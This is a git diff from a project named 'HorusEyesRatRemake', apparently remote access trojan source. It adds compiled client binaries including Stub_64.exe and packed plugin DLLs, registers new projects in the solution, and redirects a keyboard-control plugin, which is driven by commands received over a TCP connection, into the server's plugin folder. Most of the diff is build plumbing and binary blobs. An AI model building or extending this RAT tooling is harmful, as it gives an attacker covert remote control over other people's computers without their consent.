a/Client/obj/x64/Release/Costura/22AB0424DD8244A38526B6921CCB17C0DB7ED327.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/22AB0424DD8244A38526B6921CCB17C0DB7ED327.costura.options.dll.compressed new file mode 100644 index 0000000..eae2512 Binary files /dev/null and b/Client/obj/x64/Release/Costura/22AB0424DD8244A38526B6921CCB17C0DB7ED327.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/237A3D4BFDB4675EA50C52105F1A3DCC0A0502ED.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/237A3D4BFDB4675EA50C52105F1A3DCC0A0502ED.costura.options.pdb.compressed new file mode 100644 index 0000000..8f07b84 Binary files /dev/null and b/Client/obj/x64/Release/Costura/237A3D4BFDB4675EA50C52105F1A3DCC0A0502ED.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed b/Client/obj/x64/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..951925a Binary files /dev/null and b/Client/obj/x64/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/316B55571625BC926B683DC5DEB39176FD7707CC.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/316B55571625BC926B683DC5DEB39176FD7707CC.costura.options.dll.compressed new file mode 100644 index 0000000..3511f05 Binary files /dev/null and b/Client/obj/x64/Release/Costura/316B55571625BC926B683DC5DEB39176FD7707CC.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/463CCF7B372A646032C729406BF6CCAF736367F2.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/463CCF7B372A646032C729406BF6CCAF736367F2.costura.options.dll.compressed new file mode 100644 index 0000000..751d9ad Binary files /dev/null and b/Client/obj/x64/Release/Costura/463CCF7B372A646032C729406BF6CCAF736367F2.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed b/Client/obj/x64/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed new file mode 100644 index 0000000..7f5d0f2 Binary files /dev/null and b/Client/obj/x64/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/511D5EEF215E164F2FDB381118A4B9478C8564EA.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/511D5EEF215E164F2FDB381118A4B9478C8564EA.costura.options.pdb.compressed new file mode 100644 index 0000000..43b714f Binary files /dev/null and b/Client/obj/x64/Release/Costura/511D5EEF215E164F2FDB381118A4B9478C8564EA.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/58967BE924592FBB8B87C706112864A633AD33B2.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/58967BE924592FBB8B87C706112864A633AD33B2.costura.options.dll.compressed new file mode 100644 index 0000000..1a682b2 Binary files /dev/null and b/Client/obj/x64/Release/Costura/58967BE924592FBB8B87C706112864A633AD33B2.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed b/Client/obj/x64/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 0000000..d9fe526 Binary files /dev/null and b/Client/obj/x64/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/5B201DA6B49902634C033E997B644E5781FD7F4C.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/5B201DA6B49902634C033E997B644E5781FD7F4C.costura.options.pdb.compressed new file mode 100644 index 0000000..8e4286f Binary files /dev/null and b/Client/obj/x64/Release/Costura/5B201DA6B49902634C033E997B644E5781FD7F4C.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/69F29CB7825AE2A096B5D920C5F852EB740C05C8.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/69F29CB7825AE2A096B5D920C5F852EB740C05C8.costura.options.dll.compressed new file mode 100644 index 0000000..f5e0970 Binary files /dev/null and b/Client/obj/x64/Release/Costura/69F29CB7825AE2A096B5D920C5F852EB740C05C8.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/Client/obj/x64/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/Client/obj/x64/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/86BA8FE86352FF3E63582D4267A084DE2D572E5C.costura.packetlib.pdb.compressed b/Client/obj/x64/Release/Costura/86BA8FE86352FF3E63582D4267A084DE2D572E5C.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..848516e Binary files /dev/null and b/Client/obj/x64/Release/Costura/86BA8FE86352FF3E63582D4267A084DE2D572E5C.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/Client/obj/x64/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/Client/obj/x64/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/900B4A70A963F999B6A55DD59D042C86CE1A09FE.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/900B4A70A963F999B6A55DD59D042C86CE1A09FE.costura.options.dll.compressed new file mode 100644 index 0000000..b641b3b Binary files /dev/null and b/Client/obj/x64/Release/Costura/900B4A70A963F999B6A55DD59D042C86CE1A09FE.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/99A5ECE397E86AD3226620D33A0247E562A67AB2.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/99A5ECE397E86AD3226620D33A0247E562A67AB2.costura.options.dll.compressed new file mode 100644 index 0000000..726689b Binary files /dev/null and b/Client/obj/x64/Release/Costura/99A5ECE397E86AD3226620D33A0247E562A67AB2.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/9C09167E84CC180586DC6D98D5952B56A97717BD.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/9C09167E84CC180586DC6D98D5952B56A97717BD.costura.options.dll.compressed new file mode 100644 index 0000000..56dfbdd Binary files /dev/null and b/Client/obj/x64/Release/Costura/9C09167E84CC180586DC6D98D5952B56A97717BD.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/9C798D72C6D22D2136EF54C9EA5F7492600FDB30.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/9C798D72C6D22D2136EF54C9EA5F7492600FDB30.costura.options.dll.compressed new file mode 100644 index 0000000..b0ac0eb Binary files /dev/null and b/Client/obj/x64/Release/Costura/9C798D72C6D22D2136EF54C9EA5F7492600FDB30.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/A728FD074EDE8F9FA3082FFA4CEC4039BBA691AB.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/A728FD074EDE8F9FA3082FFA4CEC4039BBA691AB.costura.options.dll.compressed new file mode 100644 index 0000000..f2853cb Binary files /dev/null and b/Client/obj/x64/Release/Costura/A728FD074EDE8F9FA3082FFA4CEC4039BBA691AB.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/B08294E9AB5DD0F4763D6C22032EC22CF80DBFDC.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/B08294E9AB5DD0F4763D6C22032EC22CF80DBFDC.costura.options.dll.compressed new file mode 100644 index 0000000..154700c Binary files /dev/null and b/Client/obj/x64/Release/Costura/B08294E9AB5DD0F4763D6C22032EC22CF80DBFDC.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed b/Client/obj/x64/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed new file mode 100644 index 0000000..643f842 Binary files /dev/null and b/Client/obj/x64/Release/Costura/BBEDC29A6B1DB4E4DC655BF71F2DE0A1ED0EACA5.costura.packetlib.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/BC57877556F4EAB551D2A90B622BEC207F3BB510.costura.options.dll.compressed b/Client/obj/x64/Release/Costura/BC57877556F4EAB551D2A90B622BEC207F3BB510.costura.options.dll.compressed new file mode 100644 index 0000000..d9dd5ed Binary files /dev/null and b/Client/obj/x64/Release/Costura/BC57877556F4EAB551D2A90B622BEC207F3BB510.costura.options.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/C3C2E20DBAE0E6257CEE793706FDA80898EBC3ED.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/C3C2E20DBAE0E6257CEE793706FDA80898EBC3ED.costura.options.pdb.compressed new file mode 100644 index 0000000..5ce29c1 Binary files /dev/null and b/Client/obj/x64/Release/Costura/C3C2E20DBAE0E6257CEE793706FDA80898EBC3ED.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/D49C59EAC7E8F82B6F8F6E04F12168D6426B9148.costura.packetlib.dll.compressed b/Client/obj/x64/Release/Costura/D49C59EAC7E8F82B6F8F6E04F12168D6426B9148.costura.packetlib.dll.compressed new file mode 100644 index 0000000..ef4bd5f Binary files /dev/null and b/Client/obj/x64/Release/Costura/D49C59EAC7E8F82B6F8F6E04F12168D6426B9148.costura.packetlib.dll.compressed differ diff --git a/Client/obj/x64/Release/Costura/D746DF271DB776D368A4A599F8FABCE1A89C5D35.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/D746DF271DB776D368A4A599F8FABCE1A89C5D35.costura.options.pdb.compressed new file mode 100644 index 0000000..8397e5b Binary files /dev/null and b/Client/obj/x64/Release/Costura/D746DF271DB776D368A4A599F8FABCE1A89C5D35.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/E23EE9BD832BC8AC0F4C90E8499103865357B92F.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/E23EE9BD832BC8AC0F4C90E8499103865357B92F.costura.options.pdb.compressed new file mode 100644 index 0000000..4b8dd7e Binary files /dev/null and b/Client/obj/x64/Release/Costura/E23EE9BD832BC8AC0F4C90E8499103865357B92F.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/E45ACC7F58267EA7F7E25220E72B59F418DE2364.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/E45ACC7F58267EA7F7E25220E72B59F418DE2364.costura.options.pdb.compressed new file mode 100644 index 0000000..021a636 Binary files /dev/null and b/Client/obj/x64/Release/Costura/E45ACC7F58267EA7F7E25220E72B59F418DE2364.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/E69BC8D51305AB36A56A68CE11AA39BF37E611C0.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/E69BC8D51305AB36A56A68CE11AA39BF37E611C0.costura.options.pdb.compressed new file mode 100644 index 0000000..1223a33 Binary files /dev/null and b/Client/obj/x64/Release/Costura/E69BC8D51305AB36A56A68CE11AA39BF37E611C0.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/F3DC9FAFE49A7E715895548E9E777BE73AC54A4B.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/F3DC9FAFE49A7E715895548E9E777BE73AC54A4B.costura.options.pdb.compressed new file mode 100644 index 0000000..76b3390 Binary files /dev/null and b/Client/obj/x64/Release/Costura/F3DC9FAFE49A7E715895548E9E777BE73AC54A4B.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/F8F2A5D7BC0D68C0E4C2673ADF0BAFDC06D9DBF8.costura.options.pdb.compressed b/Client/obj/x64/Release/Costura/F8F2A5D7BC0D68C0E4C2673ADF0BAFDC06D9DBF8.costura.options.pdb.compressed new file mode 100644 index 0000000..4f9f11f Binary files /dev/null and b/Client/obj/x64/Release/Costura/F8F2A5D7BC0D68C0E4C2673ADF0BAFDC06D9DBF8.costura.options.pdb.compressed differ diff --git a/Client/obj/x64/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed b/Client/obj/x64/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..e91ead0 Binary files /dev/null and b/Client/obj/x64/Release/Costura/FEDC3B6E505E077E06053DDAAED6B43FB7B2A5A7.costura.packetlib.pdb.compressed differ diff --git a/Client/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache b/Client/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..023d5f8 Binary files /dev/null and b/Client/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/Client/obj/x64/Release/Stub_64.exe b/Client/obj/x64/Release/Stub_64.exe new file mode 100644 index 0000000..7dc7ec2 Binary files /dev/null and b/Client/obj/x64/Release/Stub_64.exe differ diff --git a/Client/obj/x64/Release/Stub_64.pdb b/Client/obj/x64/Release/Stub_64.pdb new file mode 100644 index 0000000..31f78e5 Binary files /dev/null and b/Client/obj/x64/Release/Stub_64.pdb differ diff --git a/HorusEyesRatRemake.sln b/HorusEyesRatRemake.sln index 1349fe7..a6fa5f6 100644 --- a/HorusEyesRatRemake.sln +++ b/HorusEyesRatRemake.sln @@ -31,6 +31,16 @@ Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "SL", "SL\SL.vbproj", "{1302 EndProject Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "LD", "LD\LD.csproj", "{4C9EEEEB-CBCF-42E6-A3C6-128C0B92D9AB}" EndProject +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Options", "Options\Options.csproj", "{B449A7EC-0DB2-4547-96DB-975F81161D3C}" +EndProject +Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "MO", "MO\MO.vbproj", "{BB36F621-A416-49C3-A18F-F82726B8BBBE}" +EndProject +Project("{F184B08F-C81C-45F6-A57F-5ABD9991F28F}") = "ClientDll", "ClassLibrary1\ClientDll.vbproj", "{DD547A1D-5F83-4BA1-89F2-122D070802ED}" +EndProject +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "PR", "PR\PR.csproj", "{EB2AD5DB-5A5F-472B-854A-DC377A7F3288}" +EndProject +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Utilities", "Utilities\Utilities.csproj", "{2BD5D6F6-8B32-4032-ACD5-195A54DDFE31}" +EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution Debug|Any CPU = Debug|Any CPU @@ -85,6 +95,26 @@ Global {4C9EEEEB-CBCF-42E6-A3C6-128C0B92D9AB}.Debug|Any CPU.Build.0 = Debug|Any CPU {4C9EEEEB-CBCF-42E6-A3C6-128C0B92D9AB}.Release|Any CPU.ActiveCfg = Release|Any CPU {4C9EEEEB-CBCF-42E6-A3C6-128C0B92D9AB}.Release|Any CPU.Build.0 = Release|Any CPU + {B449A7EC-0DB2-4547-96DB-975F81161D3C}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {B449A7EC-0DB2-4547-96DB-975F81161D3C}.Debug|Any CPU.Build.0 = Debug|Any CPU + {B449A7EC-0DB2-4547-96DB-975F81161D3C}.Release|Any CPU.ActiveCfg = Release|Any CPU + {B449A7EC-0DB2-4547-96DB-975F81161D3C}.Release|Any CPU.Build.0 = Release|Any CPU + {BB36F621-A416-49C3-A18F-F82726B8BBBE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {BB36F621-A416-49C3-A18F-F82726B8BBBE}.Debug|Any CPU.Build.0 = Debug|Any CPU + {BB36F621-A416-49C3-A18F-F82726B8BBBE}.Release|Any CPU.ActiveCfg = Release|Any CPU + {BB36F621-A416-49C3-A18F-F82726B8BBBE}.Release|Any CPU.Build.0 = Release|Any CPU + {DD547A1D-5F83-4BA1-89F2-122D070802ED}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {DD547A1D-5F83-4BA1-89F2-122D070802ED}.Debug|Any CPU.Build.0 = Debug|Any CPU + {DD547A1D-5F83-4BA1-89F2-122D070802ED}.Release|Any CPU.ActiveCfg = Release|Any CPU + {DD547A1D-5F83-4BA1-89F2-122D070802ED}.Release|Any CPU.Build.0 = Release|Any CPU + {EB2AD5DB-5A5F-472B-854A-DC377A7F3288}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {EB2AD5DB-5A5F-472B-854A-DC377A7F3288}.Debug|Any CPU.Build.0 = Debug|Any CPU + {EB2AD5DB-5A5F-472B-854A-DC377A7F3288}.Release|Any CPU.ActiveCfg = Release|Any CPU + {EB2AD5DB-5A5F-472B-854A-DC377A7F3288}.Release|Any CPU.Build.0 = Release|Any CPU + {2BD5D6F6-8B32-4032-ACD5-195A54DDFE31}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {2BD5D6F6-8B32-4032-ACD5-195A54DDFE31}.Debug|Any CPU.Build.0 = Debug|Any CPU + {2BD5D6F6-8B32-4032-ACD5-195A54DDFE31}.Release|Any CPU.ActiveCfg = Release|Any CPU + {2BD5D6F6-8B32-4032-ACD5-195A54DDFE31}.Release|Any CPU.Build.0 = Release|Any CPU EndGlobalSection GlobalSection(SolutionProperties) = preSolution HideSolutionNode = FALSE @@ -100,6 +130,8 @@ Global {66FEE14E-FD08-4359-A70F-2265116CE85C} = {D5F015D9-A7E1-41C1-BE30-C7F4235DF82D} {130244A9-F35C-4050-A975-CFF36C784B66} = {379F0CC1-C5FB-44FF-BAF1-284AF08CFC26} {4C9EEEEB-CBCF-42E6-A3C6-128C0B92D9AB} = {379F0CC1-C5FB-44FF-BAF1-284AF08CFC26} + {BB36F621-A416-49C3-A18F-F82726B8BBBE} = {379F0CC1-C5FB-44FF-BAF1-284AF08CFC26} + {EB2AD5DB-5A5F-472B-854A-DC377A7F3288} = {379F0CC1-C5FB-44FF-BAF1-284AF08CFC26} EndGlobalSection GlobalSection(ExtensibilityGlobals) = postSolution SolutionGuid = {D97CD9B0-B036-4BA2-9AE5-3C44593B3AAD} diff --git a/KB/KB.vbproj b/KB/KB.vbproj index 2fa3859..710ba29 100644 --- a/KB/KB.vbproj +++ b/KB/KB.vbproj @@ -30,7 +30,7 @@ false true true - bin\Release\ + ..\Server\bin\Release\Plugins\ KB.xml 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 @@ -51,7 +51,7 @@ ..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll - ..\PacketLib\bin\Debug\PacketLib.dll + ..\PacketLib\bin\Release\PacketLib.dll @@ -61,8 +61,8 @@ - - + + diff --git a/KB/Main.vb b/KB/Main.vb index da25d9a..f0a3a25 100644 --- a/KB/Main.vb +++ b/KB/Main.vb @@ -5,7 +5,7 @@ Imports System.Windows.Forms Imports PacketLib.Packet Imports PL.NativeAPI Public Class Main - Public Shared ghjk As New Thread(AddressOf KB_Thread) + Public Shared MainThread As New Thread(AddressOf KB_Thread) Public Shared B As Boolean = False Public Shared BB As Boolean = False Public Shared Sub Main(ByVal K As TcpClient, ByVal Param_Tab As Object()) @@ -16,12 +16,12 @@ Public Class Main BB = True B = True - ghjk.Start() + MainThread.Start() Case Packet_Subject.KB_ULCK BB = False - ghjk.Start() + MainThread.Start() End Select End Sub diff --git a/KB/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/KB/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/KB/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/KB/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/KB/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/KB/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/KB/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/KB/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache index e762465..37823ca 100644 Binary files a/KB/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/KB/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/KB/obj/Debug/KB.dll b/KB/obj/Debug/KB.dll index 53f4a87..67f63ef 100644 Binary files a/KB/obj/Debug/KB.dll and b/KB/obj/Debug/KB.dll differ diff --git a/KB/obj/Debug/KB.pdb b/KB/obj/Debug/KB.pdb index ae96ce3..204d3d5 100644 Binary files a/KB/obj/Debug/KB.pdb and b/KB/obj/Debug/KB.pdb differ diff --git a/KB/obj/Debug/KB.vbproj.CoreCompileInputs.cache b/KB/obj/Debug/KB.vbproj.CoreCompileInputs.cache index b57c777..394ca23 100644 --- a/KB/obj/Debug/KB.vbproj.CoreCompileInputs.cache +++ b/KB/obj/Debug/KB.vbproj.CoreCompileInputs.cache @@ -1 +1 @@ -5850779bef2ed92d71b5addf16183721647a76e9 +27391698ae89be7321a7f3708aa776d6dfc6cb05 diff --git a/KB/obj/Debug/KB.vbproj.FileListAbsolute.txt b/KB/obj/Debug/KB.vbproj.FileListAbsolute.txt index 0e7f717..52ccc1a 100644 --- a/KB/obj/Debug/KB.vbproj.FileListAbsolute.txt +++ b/KB/obj/Debug/KB.vbproj.FileListAbsolute.txt @@ -37,3 +37,16 @@ C:\Users\mehdi\Documents\HorusEyesRat-main\KB\obj\Debug\KB.vbproj.CopyComplete C:\Users\mehdi\Documents\HorusEyesRat-main\KB\obj\Debug\KB.dll C:\Users\mehdi\Documents\HorusEyesRat-main\KB\obj\Debug\KB.xml C:\Users\mehdi\Documents\HorusEyesRat-main\KB\obj\Debug\KB.pdb +Z:\HorusEyesRat-master\KB\bin\Debug\KB.dll +Z:\HorusEyesRat-master\KB\bin\Debug\KB.pdb +Z:\HorusEyesRat-master\KB\bin\Debug\KB.xml +Z:\HorusEyesRat-master\KB\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\KB\obj\Debug\KB.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\KB\obj\Debug\PL.Resources.resources +Z:\HorusEyesRat-master\KB\obj\Debug\KB.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\KB\obj\Debug\KB.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\KB\obj\Debug\KB.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\KB\obj\Debug\KB.vbproj.CopyComplete +Z:\HorusEyesRat-master\KB\obj\Debug\KB.dll +Z:\HorusEyesRat-master\KB\obj\Debug\KB.xml +Z:\HorusEyesRat-master\KB\obj\Debug\KB.pdb diff --git a/KB/obj/Debug/KB.vbproj.Fody.CopyLocal.cache b/KB/obj/Debug/KB.vbproj.Fody.CopyLocal.cache index 4cbd38b..c1cd591 100644 --- a/KB/obj/Debug/KB.vbproj.Fody.CopyLocal.cache +++ b/KB/obj/Debug/KB.vbproj.Fody.CopyLocal.cache @@ -1 +1 @@ -C:\Users\mehdi\Documents\HorusEyesRat-main\PacketLib\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/KB/obj/Debug/KB.vbproj.GenerateResource.cache b/KB/obj/Debug/KB.vbproj.GenerateResource.cache index 6ed5d66..0b103ff 100644 Binary files a/KB/obj/Debug/KB.vbproj.GenerateResource.cache and b/KB/obj/Debug/KB.vbproj.GenerateResource.cache differ diff --git a/KB/obj/Debug/KB.vbprojAssemblyReference.cache b/KB/obj/Debug/KB.vbprojAssemblyReference.cache index 43dbcc3..0619ef6 100644 Binary files a/KB/obj/Debug/KB.vbprojAssemblyReference.cache and b/KB/obj/Debug/KB.vbprojAssemblyReference.cache differ diff --git a/KB/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb b/KB/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb new file mode 100644 index 0000000..e7dcac5 --- /dev/null +++ b/KB/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb @@ -0,0 +1,7 @@ +' + Option Strict Off + Option Explicit On + + Imports System + Imports System.Reflection + diff --git a/KB/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed b/KB/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..c113eae Binary files /dev/null and b/KB/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed differ diff --git a/KB/obj/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed b/KB/obj/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..951925a Binary files /dev/null and b/KB/obj/Release/Costura/2C2012067FCE0D33665F4AD924B63599B0CF0BBA.costura.packetlib.pdb.compressed differ diff --git a/KB/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed b/KB/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed new file mode 100644 index 0000000..bda82f6 Binary files /dev/null and b/KB/obj/Release/Costura/465029873D4BFAE235F594830C05E5F1B35D657B.costura.packetlib.dll.compressed differ diff --git a/KB/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed b/KB/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..9790ff2 Binary files /dev/null and b/KB/obj/Release/Costura/465EE473F3BE6E7A77AC5800F093724428E89EB0.costura.packetlib.pdb.compressed differ diff --git a/KB/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed b/KB/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed new file mode 100644 index 0000000..7f5d0f2 Binary files /dev/null and b/KB/obj/Release/Costura/484DCA5867AD72D02E6E09F5AD232B0C2CA49CD7.costura.packetlib.dll.compressed differ diff --git a/KB/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed b/KB/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 0000000..d9fe526 Binary files /dev/null and b/KB/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/KB/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/KB/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/KB/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/KB/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed b/KB/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed new file mode 100644 index 0000000..b30cb5b Binary files /dev/null and b/KB/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed differ diff --git a/KB/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/KB/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/KB/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/KB/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed b/KB/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..5f08bb9 Binary files /dev/null and b/KB/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed differ diff --git a/KB/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed b/KB/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..baf979e Binary files /dev/null and b/KB/obj/Release/Costura/993D8FCE3C529C80A0DCDFBE56D8C8FDACCA2DE4.costura.packetlib.pdb.compressed differ diff --git a/KB/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed b/KB/obj/Release/Costura/9B30E4DA5A8534438E12E3513C46166C96BB4444.costura.packetlib.dll.compressed new file mode 100644 index 